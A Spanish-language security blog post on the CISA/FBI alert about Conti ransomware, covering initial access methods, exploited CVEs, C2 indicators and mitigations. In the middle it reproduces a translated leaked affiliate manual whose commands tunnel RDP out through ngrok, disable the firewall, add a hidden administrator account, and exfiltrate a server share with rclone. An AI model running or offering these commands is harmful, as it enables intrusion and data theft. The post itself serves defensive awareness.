Alerta! Ransomware “Conti”, medidas preventivas y publicación de las herramientas usadas por los atacantes
CISAs (Cybersecurity Infraestucure Security Agency) y el FBI el 22 de setiembre ha publicado una alerta sobre la propación del Ransomware Conti en más de 400 organizaciones estadounidenses e internacionales.
Acciones rápidas:
- -Utilizar autenticación Multifactor MFA.
- Segmentar y segregar redes y funciones.
- Actualize su sistema operativo y software.
Metodos de Acceso Inicial:
El Ransomware Conti esta desarrollado bajo el modelo Raas (Ransomware as a Service), los métodos de acceso a inicial a las redes de las victimas:
- Campañas de spearphishing que utilizan correos electrónicos personalizados que contienen archivos adjuntos maliciosos. Los archivos adjuntos maliciosos de Word contienen scripts + malware (TrickBot e IcedID, Cobalt Strike, para el movimiento lateral)
- Credenciales de Protocolo de escritorio remoto (RDP) robadas o débiles.
- Llamadas telefónicas. ( Algo nuevo!!!!)
- Software falso promocionado a través de la optimización de motores de búsqueda ;Otras redes de distribución de malware (por ejemplo, ZLoader).
- Vulnerabilidades comunes en activos externos, aqui hacer revisiones periódicas frecuentes a todos sus activos expuestos.
Vulnerabilidades aprovechadas en la red Interna:
Los actores del Ransomware Conti también explotan vulnerabilidades en activos no parchados, para moverse en la red interna realizando movimientos laterales, como:
- 2017 vulnerabilidades del servidor Microsoft Windows Server Message Block.
- Vulnerabilidad “PrintNightmare” (CVE-2021–34527) en el servicio de cola de impresión de Windows.
- Vulnerabilidad “Zerologon” (CVE-2020–1472) en sistemas Microsoft Active Directory Domain Controller.
IOCs (Indicadores de Compromiso):
De los artefactos filtrados se han identificado cuatro direcciones IP del servidor Cobalt Strike que los actores del Ransomware Conti usaban anteriormente para comunicarse con su servidor de C2 (comando y control):
- 162.244.80[.]235
- 85.93.88[.]165
- 185.141.63[.]120
- 82.118.21[.]1
Capturas de pantalla de las direcciones IP donde la banda de Conti aloja los servidores de comando y control de Cobalt Strike, que los miembros afiliados de Conti utilizan para acceder a las redes de la empresa hackeadas.
Fuentes: https://therecord.media y post original.
Afiliado de ransomware descontento filtra los manuales técnicos del grupo Conti Ransom:
De acuerdo a la información de Therecord, se filtro las conversaciones de unos de las personas afiliados a este modelo RaaS (Ransomware as a Service), donde indica que reclutan penetration testers para probar Active Directory de las redes.
Fuente: TheRECORD
También se comparten capturas de pantalla de las direcciones IP que el grupo de atacantes de la familia Conti alojan servidores de Comando y Control de Cobalt Strike que los miembros afiliados de Conti utilizan para acceder a las redes de la empresa pirateadas.
Fuente: TheRECORD
De la primera captura se puede observar que en un 2do post el usuario m1Geelka, publica Manuals and Software:
Manuales y Software utilizados:
La pesona comparte un archivo que contiene manuales y software que usa este grupo de ransom #Conti:
El enlace en sendspace.com/file/qmgq3v a la fecha ya esta desactivado.Sin embargo en algunos foros el archivo esta filtrado, los manuales y software que usa este grupo, la mayoria de material esta en ruso, pero sí te permite entender algunas herramientas y procedimientos que les compartes a sus afiliados. Agradecer a Andres Morales por esta colaboración.
Por ejemplo, herramienta: Pentest SQL
Fuente: https://github.com/NetSPI/PowerUpSQL/wiki
Herramienta: RDP NGROK
En las otras herramientas observo que hay una de RDP NGROK, el procedimiento esta en ruso, vamos intentar traducirlo y ver que trata de ejecutar, archivo original:
La traducción a español podría tener errores pero nos permite tener una idea general:
Inicio del manual “RDP NGROK.txt”:
Regístrese en https://ngrok.com/
- Descarga ngrok.exe y cárgalo en la carretilla
En el menú del panel de la cuenta de ngrok, seleccione “Su token de autenticación”.
Copie el comando con el token (sin ./). Por ejemplo:
ngrok authtoken 1vZgA1BbLWyhSjIE0f36QG6derd_5fXEPgPp8ZLxbUg
- Entramos en la carretilla y escribimos:
shell ngrok authtoken 1vZgA1BbLWyhSjIE0f36QG6derd_5fXEPgPp8ZLxbUg
- Lanzamos un túnel al puerto RDP:
shell ngrok tcp 3389
- Abrimos el RDP en carretilla:
shell reg agregar “HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server” / v fDenyTSConnections / t REG_DWORD / d 0 / f && reg agregar “HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server” / v fAllowToGetHelp 1 / f
shell NetSh Advfirewall desactivó el estado de todos los perfiles //desactiva el fw, perfiles.
shell netsh advfirewall firewall set rule group = “escritorio remoto” nueva habilitación = Sí
shell netsh firewall set service type = remotedesktop mode = enable
- Podemos agregar un usuario separado bajo ngrok: //agrega usuario Admin
shell net usuario Admin Password1 / add
Shell net localgroup Administradores Admin / agregar //grupo Administrdores
- Vaya al panel de la cuenta ngrok — compruebe el túnel (“Puntos finales — Estado”).
Copie IP: puerto desde allí y vaya a cualquier cliente RDP. Nos conectamos (también puedes usar la cuenta que creamos).
Fuente: RDP NGROK.txt (Traducio a español, con errores de la traducción)
Herramienta: RCLONE
Usa rclone para llevarse los archivos de la red interna hacia la nube:
shell rclone.exe copy “\\trucamtldc01\E$\Data” remote:Data -q — ignore-existing — auto-confirm — multi-thread-streams 12 — transfers 12
################
Medidas Preventivas:
Finalmente, compartiré algunas medidas preventivas con el objetivo de protegernos frente a ransomware:
- Backup, Backup, Restore, Restore.
- Utilizar MFA autenticación multifactor.
- Implementar Segmentación de la red y filtrar el tráfico.
- Filtre el tráfico de la red para prohibir las comunicaciones de entrada y salida con direcciones IP maliciosas conocidas.
- Habilite filtros de spam sólidos para evitar que los correos electrónicos de phishing lleguen a los usuarios finales. Filtre los correos electrónicos que contengan archivos ejecutables para evitar que lleguen a los usuarios finales.
- Implemente un programa de capacitación de usuarios para que reporten y no ingresen a sitios web maliciosos o abrir archivos adjuntos maliciosos.
- Filtro URL y contenido Web: Implemente una lista de bloqueo y / o lista de permisos de URL para evitar que los usuarios accedan a sitios web maliciosos.
- Vulnerabilidades:
-Implemente un proceso de Gestión de vulnerabilidades, que permite buscar regularmente vulnerabilidades y mantenga el software de S. O., aplicaicones, actualizado. - Anti Malware:
-Active Agentes de seguridad EDR/XDR en los servidores críticos y estaciones que permita reconocer y bloquear actividada maliciosa utilizando no solamente firmas si no teambien utilizando tecnicas basadas en comportamiento usando algoritmos de IA. - Sistema Operativos:
Implemente un proceso de gestión de parches para sistemas operativos, acualice el software y los sistemas operativos, las aplicaciones y el firmware de los activos de red de manera oportuna.
Considere la posibilidad de utilizar un sistema de gestión de parches centralizado. - Software/ Aplicaciones:
-Elimine aplicaciones innecesarias y aplique controles.
-Elimine cualquier aplicación que no se considere necesaria para las operaciones diarias.
- Investigue cualquier software no autorizado, especialmente el software de escritorio remoto o de supervisión y gestión remotas.
- Implementar la lista de permisos de aplicaciones, que solo permite que los sistemas ejecuten programas conocidos y permitidos por la política de seguridad de la organización.
Anexo 1 :
Vulnerabilidades utilizadas en la red interna para movimiento lateral:
1.- 2017 vulnerabilidades del servidor Microsoft Windows Server Message Block.
MS17–010: Actualización de seguridad para Windows Server de SMB: 14 de marzo de 2017
Permite la ejecución remota de código si un atacante envía mensajes especialmente diseñados a un servidor de Microsoft Server Message Block 1.0 (SMBv1).
Actualizaciones de Seguridad:
2. Vulnerabilidad “PrintNightmare” (CVE-2021–34527) en el servicio de cola de impresión de Windows.
En el momento en que se publicó esta publicación de blog, hay 53 scripts de explotación de PoC públicos para PrintNightmare en GitHub.
Fuente: https://github.com/search?q=CVE-2021-1675+OR+CVE-2021-34527
Security Updates:
Fuente: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527
3. Vulnerabilidad “Zerologon” (CVE-2020–1472) en sistemas Microsoft Active Directory Domain Controller.
Tenable:
Security Updates:
Fuente: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472
Anexo 2 :
Reputación de direcciones IP involucradas
Vamos a ver más detalle sobre estas direcciones IP al 23 de setiembre como fuente #virustotal.com and #shodan:
- 82.118.21[.]1
Fuentes:
(1) : Alerta CISA (Cybersecurity Infraestucure Security Agency) y el FBI), AA21–265A:
https://us-cert.cisa.gov/ncas/alerts/aa21-265a
(2) Therecord.media, Afiliado de ransomware descontento filtra los manuales técnicos de la pandilla Conti
https://therecord.media/disgruntled-ransomware-affiliate-leaks-the-conti-gangs-technical-manuals/
(3) Vulnerabilidad CVE-2020–1472 Zerologon, https://www.tenable.com/cve/CVE-2020-1472
(4) Microsoft Security Updates: CVE-2020–1472, https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472
(5) PowerUpSQL, A PowerShell Toolkit for attacking SQL Server
